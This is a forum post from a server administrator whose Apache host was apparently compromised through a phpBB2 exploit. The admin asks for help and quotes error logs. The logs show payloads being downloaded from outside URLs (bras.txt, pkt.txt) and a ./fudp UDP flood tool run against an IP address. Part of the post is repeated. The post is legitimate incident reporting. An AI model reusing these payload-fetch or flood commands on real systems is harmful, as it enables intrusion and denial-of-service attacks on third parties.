Awhile back I had found a directory created in the /temp directory that contained an IRC Eggdrop bot. Searching around for this specific Eggdrop FServ bot version told me that a few people have had it pop up and execute on their systems via a phpBB2 exploit.
I had ran Bastille to harden up my server a bit after removing the Eggdrop. Now nothing has re-appeared in my /temp folder that is out of the ordinary.
However, Apache 2.x has been crashing "randomly", even after recompiles. So looking into the Error logs I find:
And then:
Of course some IRC Perl bot. I'm pretty certain that these are left-over from the phpBB2 exploited temp directory. I don't think its active, as I don't see any other users on the shell using anything during these times (doesn't rule out a rootkit of course), however I've ran chkroot and rkhunter and they didn't find anything. Also, my datacenter's switch filters out all IRC traffic anyway, so it hasn't exactly been useful for them.
Any ideas on at least how to stop Apache from executing these shell commands, or at least where to find out what is going on? I've just never heard of Apache doing this before.
Any help would be appreciated.
I had ran Bastille to harden up my server a bit after removing the Eggdrop. Now nothing has re-appeared in my /temp folder that is out of the ordinary.
However, Apache 2.x has been crashing "randomly", even after recompiles. So looking into the Error logs I find:
Code:
[Tue May 01 07:22:01 2007] [notice] Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d PHP/4.4.6 FrontPage/5.0.2.2634 configured -- resuming normal operations
sh: fetch: command not found
--08:11:05-- http://efardella.cinet.it/claroline/work/bras.txt
=> `bras.txt'
Resolving efardella.cinet.it... 212.131.214.212
Connecting to efardella.cinet.it|212.131.214.212|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,051 (19K) [text/plain]
0K .......... ........ 100% 18.07 KB/s
08:11:11 (18.07 KB/s) - `bras.txt' saved [19051/19051]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
6 19051 6 1218 0 0 2761 0 0:00:06 --:--:-- 0:00:06 2761
52 19051 52 9906 0 0 11436 0 0:00:01 --:--:-- 0:00:01 20394
100 19051 100 19051 0 0 19006 0 0:00:01 0:00:01 --:--:-- 31731
Code:
[Tue May 01 19:22:02 2007] [notice] caught SIGTERM, shutting down
sh: line 1: 8120 Killed ./fudp -d 74.53.69.195 -z 20 -t 2000 -p 80 2>&1 3>&1
sh: line 1: 8291 Killed ./fudp -d 74.53.69.195 -z 20 -t 40000 -p 80 2>&1 3>&1
And then:
Code:
Tue May 01 18:22:01 2007] [notice] Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d PHP/4.4.6 FrontPage/5.0.2.2634 configured -- resuming normal operations
--18:25:16-- http://www.freewebs.com/guilherme182/pkt.txt
=> `pkt.txt'
Resolving www.freewebs.com... 38.103.0.2
Connecting to www.freewebs.com|38.103.0.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,982 (19K) [text/plain]
0K .......... ........ 100% 226.68 KB/s
18:25:21 (226.68 KB/s) - `pkt.txt' saved [18982/18982]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
5 18982 5 1181 0 0 12648 0 0:00:01 --:--:-- 0:00:01 12648
100 18982 100 18982 0 0 91927 0 --:--:-- --:--:-- --:--:-- 153k
sh: fetch: command not found
sh: line 1: 5597 Killed ./fudp -d 74.53.69.195 -z 20 -t 80 -p 0 2>&1 3>&1
[Tue May 01 19:21:03 2007] [notice] SIGHUP received. Attempting to restart
Of course some IRC Perl bot. I'm pretty certain that these are left-over from the phpBB2 exploited temp directory. I don't think its active, as I don't see any other users on the shell using anything during these times (doesn't rule out a rootkit of course), however I've ran chkroot and rkhunter and they didn't find anything. Also, my datacenter's switch filters out all IRC traffic anyway, so it hasn't exactly been useful for them.
Any ideas on at least how to stop Apache from executing these shell commands, or at least where to find out what is going on? I've just never heard of Apache doing this before.
Any help would be appreciated.